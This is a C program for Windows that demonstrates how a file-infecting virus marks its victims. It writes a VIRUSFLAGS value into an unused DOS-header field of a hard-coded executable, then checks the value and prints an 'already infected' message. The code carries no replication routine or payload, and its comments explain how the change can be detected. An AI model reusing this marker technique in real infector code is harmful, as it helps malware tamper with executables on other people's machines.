#include <stdio.h> #include <stddef.h> #include <windows.h> #define VIRUSFLAGS 0xCCCC
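/*
 * Write the 32-bit value dwSig into the file at byte offset dwAddr.
 *
 * hFile must have been opened with write access. A full DWORD is written, so
 * the four bytes starting at dwAddr are overwritten even when the structure
 * field located at that offset is narrower than four bytes.
 *
 * Returns TRUE only when the seek succeeded and all four bytes were written,
 * FALSE otherwise.
 */
BOOL WriteSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile)
{
    DWORD dwWritten = 0;

    /* With a NULL high-part pointer, INVALID_SET_FILE_POINTER means failure. */
    if (SetFilePointer(hFile, dwAddr, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER) {
        return FALSE;
    }

    if (!WriteFile(hFile, &dwSig, sizeof(DWORD), &dwWritten, NULL)) {
        return FALSE;
    }

    /* A short write leaves a partial value on disk; report it as a failure. */
    return (dwWritten == sizeof(DWORD)) ? TRUE : FALSE;
}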
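/*
 * Test whether the 32-bit value stored in the file at byte offset dwAddr
 * equals dwSig.
 *
 * hFile must have been opened with read access. Four bytes are read and
 * compared as one DWORD.
 *
 * Returns TRUE only when the seek and the read both succeeded, four bytes
 * were obtained, and the value matches dwSig. Any I/O failure or short read
 * yields FALSE, so a failed read can never be mistaken for a match (the
 * zero-initialised buffer would otherwise compare equal to dwSig == 0).
 */
BOOL CheckSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile)
{
    DWORD dwStored = 0;
    DWORD dwRead = 0;

    /* With a NULL high-part pointer, INVALID_SET_FILE_POINTER means failure. */
    if (SetFilePointer(hFile, dwAddr, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER) {
        return FALSE;
    }

    if (!ReadFile(hFile, &dwStored, sizeof(DWORD), &dwRead, NULL)) {
        return FALSE;
    }

    /* Reading past end of file succeeds with fewer bytes; treat as no match. */
    if (dwRead != sizeof(DWORD)) {
        return FALSE;
    }

    return (dwStored == dwSig) ? TRUE : FALSE;
}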
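/*
 * Demonstration of a marker value stored in an unused DOS-header field.
 *
 * Opens the hard-coded file, maps it, verifies the "MZ" magic, writes
 * VIRUSFLAGS at the offset of IMAGE_DOS_HEADER.e_cblp and then reads it back.
 *
 * Notes for the reader:
 *  - e_cblp is a WORD at byte offset 2, but WriteSig/CheckSig operate on a
 *    DWORD, so the following WORD field (e_cp) is overwritten as well.
 *  - The marker is written unconditionally before it is checked, so after a
 *    successful write the check below always reports the marker as present.
 *  - The PE loader relies on e_magic and e_lfanew, which is why the file still
 *    loads after this change. Comparing these header bytes against a
 *    known-good copy of the file reveals the modification.
 *
 * Returns 0 on success and -1 on any failure. Every handle and the mapped
 * view are released on all paths.
 */
int main(int argc, char* argv[])
{
    HANDLE hFile = INVALID_HANDLE_VALUE;
    HANDLE hMap = NULL;
    LPVOID lpBase = NULL;
    PIMAGE_DOS_HEADER pDosHeader = NULL;
    DWORD dwSize = 0;
    int rc = -1;

    (void)argc;
    (void)argv;

    hFile = CreateFile("c://1.exe", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ,
                       0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
    if (hFile == INVALID_HANDLE_VALUE) {
        fprintf(stderr, "CreateFile failed (%lu)\n", (unsigned long)GetLastError());
        goto out;
    }

    /* A file shorter than the DOS header cannot be a valid executable, and
     * writing at the marker offset would silently extend it. */
    dwSize = GetFileSize(hFile, NULL);
    if (dwSize == INVALID_FILE_SIZE || dwSize < sizeof(IMAGE_DOS_HEADER)) {
        printf("文件非可执行文件 \n");   /* "file is not an executable" */
        goto out;
    }

    hMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, 0);
    if (hMap == NULL) {
        fprintf(stderr, "CreateFileMapping failed (%lu)\n", (unsigned long)GetLastError());
        goto out;
    }

    lpBase = MapViewOfFile(hMap, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
    if (lpBase == NULL) {
        fprintf(stderr, "MapViewOfFile failed (%lu)\n", (unsigned long)GetLastError());
        goto out;
    }

    pDosHeader = (PIMAGE_DOS_HEADER)lpBase;
    if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
        printf("文件非可执行文件 \n");   /* "file is not an executable" */
        goto out;
    }

    if (!WriteSig(offsetof(IMAGE_DOS_HEADER, e_cblp), VIRUSFLAGS, hFile)) {
        fprintf(stderr, "WriteSig failed (%lu)\n", (unsigned long)GetLastError());
        goto out;
    }

    if (CheckSig(offsetof(IMAGE_DOS_HEADER, e_cblp), VIRUSFLAGS, hFile)) {
        /* "file is already infected, cannot be infected again" */
        printf("文件已被感染,无法重复感染. \n");
    }

    rc = 0;

out:
    if (lpBase != NULL) {
        UnmapViewOfFile(lpBase);
    }
    if (hMap != NULL) {
        CloseHandle(hMap);
    }
    if (hFile != INVALID_HANDLE_VALUE) {
        CloseHandle(hFile);
    }

    /* The original paused only on the non-error path; keep that behaviour. */
    if (rc == 0) {
        system("pause");
    }
    return rc;
}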